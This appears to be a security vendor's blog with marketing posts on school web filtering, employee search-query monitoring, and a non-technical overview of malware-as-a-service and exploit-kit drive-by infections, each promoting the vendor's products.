Thursday 8 May 2014

Protecting Tech-savvy kids

Kids these days – they’re have been born and bred in a world which people like myself (despite being 34 years old) have had to get used too. It’s no wonder then that many of today’s kids are much more tech-savvy than their parents. It’s not just a possibility that kids are teaching their parents about technology – it’s a fact of life.

I would also dare say, that kids are most times not just more tech-savvy than their parts, but also more tech-savvy than their educators. And despite web filtering being a most basic need in schools and educational institutions – there are cases when either web filtering is not deployed, or else kids have figured out a way to bypass the web filtering technology.

Sometimes, it’s not even a question of being tech-savvy, it’s just a question of accessibility to information. During my research on web filtering technology I often come across forums with users asking how to bypass their web filtering technology – with many of them being posted by children in schools.

So it’s not really surprising when you read something such as yesterday’s news where it was discovered that fourth and fifth graders in a school in Illinois where able to access pornography at school using a school computer. Despite there is the possibility that kids have managed to bypass the web filtering software themselves, many times the reasons are actually much simpler. Truth be told, cash-strapped schools may simply not bother looking for a complete solution which ensures users aren’t able to access dodgy sites at school.

The good thing is that being cash-strapped is not really an excuse because web filtering technology such as GFI Cloud are very affordable and with a correct setup will ensure that students aren’t able to access pornography or other problematic sites. Parents should do their part too in demanding that good controls are in place.

Specifically in the US federal funding is available for implementation of web filtering and other protective technologies under the Child Internet Protection Act (CIPA). GFI Cloud and other GFI technologies will help schools and other educational institutions achieve CIPA compliance and thus be available for funding.

Steps to prevent the bypassing of web filtering technologies


It’s a good idea to test the web filtering software implementation well before going live. Usually it takes simple steps such as deploying particular group policies on computers, removing administrative rights or other simple ways of protecting the technology in place. It is also a good idea for the company implementing the web filter to actually think like a kid and actually look for ways to bypass the filter. If they can do it, rest assured that the kids will find a way around it too.


GFI Cloud allows you to implement good web filtering technology to help protect students from accessing pornography or bypassing the web filter. If you would like to know more about GFI Cloud – Web Protection server visit: http://www.gficloud.com

Wednesday 4 December 2013

Gauging employees’ moods using their search trends

In today’s times, it is not difficult to understand the need for web filtering. The pervasive and ever-increasing threats being pushed through websites is always on the increase, and you should already know that you need to have multiple web security engines in place including a web filtering solution. Besides web filtering based on websites address and categories, there are a number of features which can stand out and give the company additional benefits. One of these is search engine query monitoring. By monitoring what a user is actively searching for on the popular search engines, you can gauge an employee’s mood. By monitoring these searches one can determine many things
  1. Whether the user is actively performing work related searches (most of their queries should be work related) 
  2. Whether they are doing anything suspicious 
  3. If they have particular personal or personality problems which might require the company’s assistance

So what exactly is search engine query monitoring?

Search engine query monitoring is the ability to identify and log the search terms when users perform a search on a search engine. So if I run the following query: https://www.google.com/#q=talk+tech+to+me the web filter will extract the “talk tech to me” keywords and log them.

Why is it useful?

Well, under most circumstances you will see mundane stuff, typically searches related to the users work and many times their personal interests. However, there are many instances which you can see things which the company probably wants to be aware of. Let’s say you find something like https://www.google.com/#q=web+filter+bypass , you will immediately know that this user is trying to do something fishy. Even much more worrying would be if you find a query such as https://www.google.com/#q=ways+to+commit+suicide. Essentially, besides the websites that a user is trying to visit, the searches they are conducting will give a very clear picture if all is ok, or if there is something wrong or any suspicious activities.

Great, tell me how to do it!

GFI WebMonitor provides this functionality is a standard part of its web filtering features. You can define policies to exclude users who you don’t want to be monitored if you wanted to, but by default users search queries will be monitored and logged.

What search engines are supported?

Google, Bing, Yahoo!, Lycos.  Queries on any of these search engines will be monitored. Given that Yandex is the most popular search engine in Russia and other east european countries, GFI WebMonitor also supports search engine monitoring for Yandex.

Search over HTTPS? Will search engine monitoring work in this case?

We’ve seen many search engines sending search queries over HTTPS. This has created a bit of a furore in the web Analytics world, but this does not really affect GFI WebMonitor, since HTTPS scanning is supported. When this is enabled, GFI WebMonitor will still be able to inspect queries over HTTPS and thus the queries will still show up. This is also a security feature which ensures that if users are trying to visit HTTPS based websites, GFI WebMonitor can still monitor and protect the end user.

What value does this give me?

We’ve already identified a number of ways these helps you gauge the mood of employee’s in the company. Moreover, GFI WebMonitor has the ability to run a periodic report searching for specific keywords which you are mostly interested in. For example, by default GFI WebMonitor has a number of reports which can give a company value out of the box, without having to configure anything

1) TV Series or Movie Downloads – people attempting to search for TV series or movies to download which could lead to legal liability when pirated material is downloaded via the company’s connection

2) Adult and Pornography Searches – people attempting to search for Adult content via search engines despite you blocking Adult websites

3) High Risk Searches – searches for explosives, weapons, suicide or other possible problematic situations

4) Your own custom search term report – GFI WebMonitor allows you to easily create your own reports for specific terms, and in any language you want

Interested yet? Try GFI WebMonitor for 30 days and monitor what your users are searching for. You might be surprised!

Malware as a Service

Cloud based services are all the rage these days, every kind of software services available are typically available as a cloud or software as a service offering. And when we say every kind of software service, we do mean every kind of software service – including malicious software services. Malware as a service has become by far the most common way that malware is distributed. Here we’ll attempt to give a non-technical overview of how this industry works.

So what exactly is Malware-as-a-Service (MaaS) and why it is used?

Malware as a service is essentially an online service which is used by people who have written a specific piece of malware and want this to get distributed quickly. Essentially what the MaaS does is take the headache out of distributing the malware. Let’s say you’ve written your own malware program which you want to distribute. You could do a few things to help push its distribution

1. Infect pirated software with your malware and upload it to common piracy websites
2. Create a website which invites visitors to download something fake which in reality is your malware
3. Make the virus self-replicating and distribute it via some kind of software vulnerability
4. Infect your friends USB sticks with the malware and rename it to something which they are likely to open

As you can see all of the above either require a significant amount of effort or are not really effective. The MaaS also known as exploit kits effectively allow you to distribute your malware at a very cost-effective price. If your malware is going to give you financial benefits, then a MaaS service to distribute the malware widely will be very handy, and very cheap. Quoted prices from certain exploit kits start from as low as $50 for using the kit for a day, to $1500 for a year’s service making it very cheap considering its effectiveness.

But how does the infection happen?

There are a number of steps which happen to infect a user. Let’s say that you don’t want to go through the above processes to distribute the malware and you’ve decided to use an exploit kit. After paying for the service, the following will happen

Step 1: Your malware is loaded onto a distribution server ready to get deployed to new victims

Step 2: The MaaS authors discover web servers of legitimate software which have problems or vulnerabilities in their setups. These vulnerabilities allow the MaaS authors to inject a piece of hidden HTML code which will be used to perform certain malicious actions

Step 3: A normal user visits the legitimate (but compromised) website. The hidden code analyses the user and detects what browser and other software they have installed on their computer. If the user has software which has not been unpatched then the next step is executed

Step 4: Based on the analysis in step 3 the user is redirected to another website which will use a targeted exploit to infect the user with the malware. As an example, if a user has a version of Java which hasn’t been updated, they will be redirected to an Java exploit

Step 5: The exploit is executed which deploys the malware using the unpatched vulnerability

The effectiveness of the distribution is due to a number of reasons

1. The sheer amount of compromised websites (millions) which exist on the internet right now and which will keep getting compromised in the future allowing for a huge audience to be exposed to the malware
2. The fact that these sites are actually legitimate sites which normal users will visit – they just have been hijacked with some invisible malicious code

3. The delivery of an exploit targeted to the specific user’s unpatched software – they will attach the user with an exploit which they know will work

4. The fact that the exploit does not need any kind of additional user interaction such as a click or a download. Just visiting the website will result in an infection (what is termed as a drive-by download)

5. The lucrative business of MaaS which allows the authors to keep expanding the sites they use, the exploits they use, the AV avoidance techniques

6. Using spamming, SEO poisoning, or other techniques to push users towards the compromised sites

How effective are these kits? And how many of them are there?

Very effective. Different security vendors quote different numbers for each kit, but all of them agree on one common conclusion. These malicious websites used by these kits make up the absolute majority of threats in the wild today. The majority of infections which happen today are coming from these exploit kits. Old viruses and distribution methods have become insignificant when compared to these new malicious URLs. There are tens of exploits kits out there, the Blackhole Exploit kit used to be one of the most effective (though the author Paunch has reportedly been arrested and the kit is no longer being updated), Neutrino, Glazunov and many more. As the business gets more lucrative the MaaS authors start to get competitive between themselves, making improvements in all aspects of the kit from usability, price, infection and obfuscation techniques.

Ouch! … How do I protect myself and my employees?

Essentially, you can never keep know or keep track of which legitimate websites have been compromised so you need a little help. You’ll need to put multiple mechanisms in place to protect yourself and your employees. First, you need to make sure all the browsers and software on your user’s machines have been fully patched – Languard or GFI Cloud – Patch Management is an essential tool to help you with this. Second, you need to put a web security software in place which stops users from visiting websites which have been detected to contain malicious payloads. GFI WebMonitor or GFI Cloud Web Protection both will protect your users from visiting these websites. Thirdly, you still need to have an Anti-Virus on your machines to ensure that malicious software payloads are detected and stopped – GFI Cloud – Anti-virus is the right tool here. If you miss any of these protections, it’s only a matter of time before your users are exposed to something dangerous without their knowledge.